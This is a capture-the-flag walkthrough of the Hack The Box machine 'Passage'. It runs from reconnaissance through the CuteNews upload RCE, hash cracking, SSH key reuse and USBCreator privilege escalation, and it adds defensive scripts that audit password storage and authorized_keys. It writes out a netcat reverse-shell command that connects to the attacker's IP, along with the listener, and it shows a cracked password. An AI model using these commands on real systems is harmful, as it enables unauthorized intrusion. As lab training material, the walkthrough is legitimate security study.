# Passage ~ Hack The Box

* * *

### Prerequisite

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985581281/a3773839-4e8d-4a89-adf0-3d02c8f2fbe2.jpeg)

To make life easier, I usually add an entry to my hosts file so the target machine can be reached by name (the IP below is the one the Nmap scan reports for `passage.htb`).

    echo "10.10.10.206	passage.htb" >> /etc/hosts

hosts file entry

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985582335/f9f45488-3134-4a00-8670-d3c857d8aea8.png)

Okay now onto the hacking!

* * *

### Reconnaissance

As always, I started off with an Nmap scan against the machine.

    ┌──(root💀kali)-[/home/…/boxes/htb/machines/passage]
    └─# nmap -Pn -sC -sV -oN initial passage.htb 

    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-11 18:36 EST
    Nmap scan report for passage.htb (10.10.10.206)
    Host is up (0.0056s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
    |   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
    |_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Passage News
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

### Scanning & Enumeration

Based on the scan, I saw that port 80 was running a web server. This was the web app being served:

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985583457/a22e9d6d-30e6-48fc-b813-c1a1fd3b1241.png)

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985584550/0113deef-9e9a-4f27-b9a0-f9b1c56c1534.png)

There wasn't much on the page itself, except that it was powered by `CuteNews`. So I took a look at the source code.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985585494/072f1971-4d18-48a4-98dd-0e6acef3e404.png)

The source revealed a directory named `CuteNews`. Accessing that brought me to a login page.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985586487/05f31788-6803-441c-bf5d-0576d654dc88.png)

The login page also showed the version of the web app that was running.

A quick Google search revealed that there was an [RCE exploit](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11447) for this version of `CuteNews` (CVE-2019-11447). There was also a [PoC](https://github.com/CRFSlick/CVE-2019-11447-POC) on GitHub by [CRFSlick](https://github.com/CRFSlick).

### Exploitation

This exploit abuses the profile picture upload, which allows a registered user to upload and run arbitrary code on the remote machine. The [Python script](https://github.com/CRFSlick/CVE-2019-11447-POC.git) I used automated all of these steps and gave a live remote shell.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985587549/0f8601a8-77b7-4688-9498-a9204efe1c3e.png)

Before running the exploit, I had to create an account on the website.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985588673/eda84c5a-92cc-4a5b-92fb-4a27f169f838.png)

After that, I ran the exploit, which gave me a reverse shell on the box.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985589691/8e55dcb4-24c1-4695-b41a-7369cb205916.png)

All that was left was to upgrade to a proper reverse shell back to my machine using `bash`/`nc`.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985590892/4bdfb32e-393b-4a65-a759-c2a78298d8d4.png)

    Remote Machine:
    $> nc -e /bin/bash 10.10.14.47 666
    
    Local Machine:
    ┌──(root💀kali)-[/home/…/boxes/htb/machines/passage]
    └─# nc -lvp 666

### Lateral Movement [Level 1]

After poking around for a while, I noticed that `CuteNews` stored its users' password hashes in the `cdata/users` directory, so I decided to explore this. From the home directories, I was also aware of a user named `paul`.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985592100/53fb5018-3eaa-46c9-81ae-8d6d84a363c2.png)

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985593941/3059e3cd-3236-4726-b652-eac319c6ca80.png)

There were too many for me to go through by hand, so I concatenated all the files together and removed everything that was not a hash.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985595010/a80890c7-5480-4a7d-9e03-d31e9050f03b.png)

This made it easier to decode the `base64` values, which I did with CyberChef.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985596278/9fd1f29c-2d99-4d70-916e-cdd5ffe80c2e.png)

CyberChef

Next, I grepped the decoded output for `paul` to get his password hash.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985597522/4302c339-6ba7-4695-b625-74c6d50378fe.png)

With the hash in hand, I turned to [CrackStation](https://crackstation.net/) to crack it quickly.

    e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985598941/e0416b1b-9db5-49dc-a035-077acc6a34e9.png)

The password was `atlanta1`, and with it I was able to retrieve the user flag from paul's account!

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985599916/df6ca41b-96ab-4a60-be1a-0a9b1c40e76b.png)
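The hash extraction above can be scripted. This is an added example, not code from the writeup or from CuteNews: it strips the PHP guard line from CuteNews-style user files, base64-decodes each record, pulls out every user's 64-hex digest, and confirms that the stored value is a plain, unsalted SHA-256 of the password, which is exactly why a lookup table such as CrackStation resolves it instantly. The record layout and the sample files are constructed assumptions; the `paul` digest is the one shown above.

```python
import base64
import hashlib
import re

PAUL_HASH = "e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd"  # from the writeup


def _record(name: str, sha256_hex: str) -> str:
    """Build a constructed file in the shape of a CuteNews cdata/users entry:
    a PHP guard line, then base64 of a PHP-serialised array (layout assumed)."""
    body = (f'a:1:{{s:4:"name";a:1:{{s:{len(name)}:"{name}";a:2:{{'
            f's:4:"name";s:{len(name)}:"{name}";s:4:"pass";s:64:"{sha256_hex}";}}}}}}')
    return "<?php die('Direct call - access denied'); ?>\n" + base64.b64encode(body.encode()).decode()


# Constructed sample "directory": a record for paul and one for a made-up user.
SAMPLE_FILES = {
    "cdata/users/1.php": _record("paul", PAUL_HASH),
    "cdata/users/2.php": _record("demo", hashlib.sha256(b"constructed-pw").hexdigest()),
}

NAME_RE = re.compile(r's:4:"name";s:\d+:"([^"]+)"')
PASS_RE = re.compile(r's:4:"pass";s:64:"([0-9a-f]{64})"')


def decode_records(files: dict[str, str]) -> list[str]:
    """Drop PHP guard lines, keep only base64-looking lines, and decode them."""
    out = []
    for text in files.values():
        for line in text.splitlines():
            line = line.strip()
            if not line or line.startswith("<?php"):
                continue
            try:
                out.append(base64.b64decode(line, validate=True).decode("latin-1"))
            except ValueError:  # binascii.Error is a ValueError; skip non-base64 lines
                continue
    return out


def hashes_by_user(files: dict[str, str]) -> dict[str, str]:
    """Map each user name found in the decoded records to its stored digest."""
    found = {}
    for rec in decode_records(files):
        name, pw = NAME_RE.search(rec), PASS_RE.search(rec)
        if name and pw:
            found[name.group(1)] = pw.group(1)
    return found


def is_unsalted_sha256(stored_hex: str, candidate: str) -> bool:
    """True if stored_hex is the bare SHA-256 of candidate: no salt, no stretching."""
    return hashlib.sha256(candidate.encode()).hexdigest() == stored_hex
```

A positive result from `is_unsalted_sha256` is the finding a defender cares about: the CMS stores fast, unsalted digests, so any reused or dictionary password is one table lookup away.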

### Lateral Movement [Level 2]

Looking at the `.ssh` directory showed that `nadav@passage` had key-based access to Paul's account.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985601046/bc26cb17-1347-49c4-b97e-1400bd625dbd.png)

So I assumed that Paul's key would give the same access to nadav's account and tried to SSH in.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985602254/b94802c7-1123-4748-af82-2df440b32857.png)

And... I was in `nadav`'s account!
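The clue here was a key in paul's `authorized_keys` whose comment named `nadav@passage`. As an added example (mine, not from the writeup), the audit below parses `authorized_keys` contents for several accounts, fingerprints each key the way `ssh-keygen -l` does, and flags keys that grant access to more than one account or whose comment names a different user than the account accepting it. The key blobs are constructed placeholders, not real keys.

```python
import base64
import hashlib
from collections import defaultdict

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521", "ssh-dss")

# Constructed placeholders: base64 of arbitrary bytes standing in for key blobs.
SHARED_KEY = base64.b64encode(b"constructed-key-shared-by-nadav-and-paul").decode()
OTHER_KEY = base64.b64encode(b"constructed-key-only-nadav").decode()

# Constructed authorized_keys contents per account, mirroring the writeup's finding.
AUTHORIZED_KEYS = {
    "paul": f"ssh-rsa {SHARED_KEY} nadav@passage\n",
    "nadav": f"ssh-rsa {SHARED_KEY} nadav@passage\nssh-ed25519 {OTHER_KEY} nadav@laptop\n",
}


def parse_line(line: str):
    """Return (keytype, blob, comment) or None. Leading options are skipped by
    locating the key-type token; options containing quoted spaces are not handled."""
    parts = line.split()
    for i, tok in enumerate(parts):
        if tok in KEY_TYPES and i + 1 < len(parts):
            return tok, parts[i + 1], " ".join(parts[i + 2:])
    return None


def fingerprint(blob: str) -> str:
    """OpenSSH-style SHA256 fingerprint: base64 of the digest, padding stripped."""
    digest = hashlib.sha256(base64.b64decode(blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def audit(authorized_keys: dict[str, str]):
    """Map fingerprint -> accounts that accept it, plus a list of findings."""
    accounts, findings = defaultdict(set), []
    for user, text in authorized_keys.items():
        for line in text.splitlines():
            parsed = parse_line(line.strip())
            if not line.strip() or line.startswith("#") or parsed is None:
                continue
            _ktype, blob, comment = parsed
            fp = fingerprint(blob)
            accounts[fp].add(user)
            owner = comment.split("@")[0]
            if owner and owner != user:  # comment claims a different identity
                findings.append(f"{user}: accepts key {fp} whose comment names {comment}")
    for fp, users in accounts.items():
        if len(users) > 1:  # one key unlocks several accounts: lateral movement path
            findings.append(f"key {fp} grants access to {sorted(users)}")
    return dict(accounts), findings
```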

### Privilege Escalation

As always, I ran `LinPEAS`, which flagged that the USBCreator service on the machine was vulnerable and could be exploited!

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985603342/a54dfe91-fe1c-4e54-b573-0ce3983e6a88.png)

A couple of Google searches later, I found a [PoC with explanation](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/) by Palo Alto Networks' Unit 42, which I used to exploit this vulnerability!

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985604467/d0ea30e7-3a40-4ce7-8e7e-b4f5bd342345.png)

ROOTY!
